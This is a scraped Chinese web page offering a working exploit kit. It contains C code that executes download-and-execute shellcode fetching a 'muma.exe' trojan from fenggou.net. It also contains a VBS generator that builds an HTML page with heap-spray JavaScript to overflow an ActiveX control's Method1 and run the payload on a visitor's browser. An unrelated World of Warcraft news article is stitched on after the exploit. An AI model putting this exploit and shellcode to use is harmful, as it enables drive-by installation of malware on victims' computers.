C++代码
复制代码 代码如下:
#include <stdio.h>     
#include <string.h>     

unsigned char shellcode[] =     
"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03"    
"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74"    
"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E"    
"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03"    
"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C"    
"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40"    
"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C"    
"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC"    
"\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F"    
"\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB"    
"\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83"    
"\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF"    
"\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF"    
"http://fenggou.net/muma.exe";     

int main()     
{     
void (* code)(); //把ShellCode转换成一个参数为空,返回为空的函数指针,并调用     
* (int *) & code = shellcode;     
code();     


vbs代码
复制代码 代码如下:
exeurl = InputBox( "Please input you want down&exec url:", "输入","http://jb51.net/muma.exe" )    
if exeurl <> "" then    
code="\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF"&Unicode(exeurl&Chr(00)&Chr(00))    
Function Unicode(str1)    
Dim str,temp    
str = ""   
For i=1 to len(str1)    
temp = Hex(AscW(Mid(str1,i,1)))    
If len(temp) < 5 Then temp = right("0000"&temp, 2)    
str = str & "\x" & temp    
Next    
Unicode = str    
End Function    
function replaceregex(str)    
set regex=new regExp    
regex.pattern="\\x(..)\\x(..)"   
regex.IgnoreCase=true   
regex.global=true   
matches=regex.replace(str,"%u$2$1")    
replaceregex=matches    
end Function    
set fso=createObject("scripting.filesystemobject")    
if fso.FileExists("jb51.htm") then    
fso.deleteFile "jb51.htm",True    
end If    
set fileS=fso.opentextfile("jb51.htm",8,true)    
fileS.writeline "<html>"   
fileS.writeline "<title>Sina</title>"   
fileS.writeline "<object classid=""clsid:8EF2A07C-6E69-4144-96AA-2247D892A73D"" id='target'></object>"   
fileS.writeline "<body>"   
fileS.writeline "<SCRIPT language=""JavaScript"">"   
fileS.writeline "var shellcode = unescape("""&replaceregex(code)&""");"   
fileS.writeline "var bigblock = unescape(""%u9090%u9090"");"   
fileS.writeline "var headersize = 20;"   
fileS.writeline "var slackspace = headersize+shellcode.length;"   
fileS.writeline "while (bigblock.length<slackspace) bigblock+=bigblock;"   
fileS.writeline "fillblock = bigblock.substring(0, slackspace);"   
fileS.writeline "block = bigblock.substring(0, bigblock.length-slackspace);"   
fileS.writeline "while(block.length+slackspace<0x40000) block = block+block+fillblock;"   
fileS.writeline "memory = new Array();"   
fileS.writeline "for (x=0; x<300; x++) memory[x] = block +shellcode;"   
fileS.writeline "var buffer = '';"   
fileS.writeline "while (buffer.length < 218) buffer+='\x0a\x0a\x0a\x0a';"   
fileS.writeline "target.Method1(buffer);"   
fileS.writeline "</script>"   
fileS.writeline "</body>"   
fileS.writeline "</html>"   
files.Close    
Set fso=nothing    
end if 
标签:
ActiveX,漏洞通用,Exploit,vbs

免责声明:本站文章均来自网站采集或用户投稿,网站不提供任何软件下载或自行开发的软件! 如有用户或公司发现本站内容信息存在侵权行为,请邮件告知! 858582#qq.com
白云城资源网 Copyright www.dyhadc.com

评论“ActiveX漏洞通用Exploit vbs修正版”

暂无“ActiveX漏洞通用Exploit vbs修正版”评论...

《魔兽世界》大逃杀!60人新游玩模式《强袭风暴》3月21日上线

暴雪近日发布了《魔兽世界》10.2.6 更新内容,新游玩模式《强袭风暴》即将于3月21 日在亚服上线,届时玩家将前往阿拉希高地展开一场 60 人大逃杀对战。

艾泽拉斯的冒险者已经征服了艾泽拉斯的大地及遥远的彼岸。他们在对抗世界上最致命的敌人时展现出过人的手腕,并且成功阻止终结宇宙等级的威胁。当他们在为即将于《魔兽世界》资料片《地心之战》中来袭的萨拉塔斯势力做战斗准备时,他们还需要在熟悉的阿拉希高地面对一个全新的敌人──那就是彼此。在《巨龙崛起》10.2.6 更新的《强袭风暴》中,玩家将会进入一个全新的海盗主题大逃杀式限时活动,其中包含极高的风险和史诗级的奖励。

《强袭风暴》不是普通的战场,作为一个独立于主游戏之外的活动,玩家可以用大逃杀的风格来体验《魔兽世界》,不分职业、不分装备(除了你在赛局中捡到的),光是技巧和战略的强弱之分就能决定出谁才是能坚持到最后的赢家。本次活动将会开放单人和双人模式,玩家在加入海盗主题的预赛大厅区域前,可以从强袭风暴角色画面新增好友。游玩游戏将可以累计名望轨迹,《巨龙崛起》和《魔兽世界:巫妖王之怒 经典版》的玩家都可以获得奖励。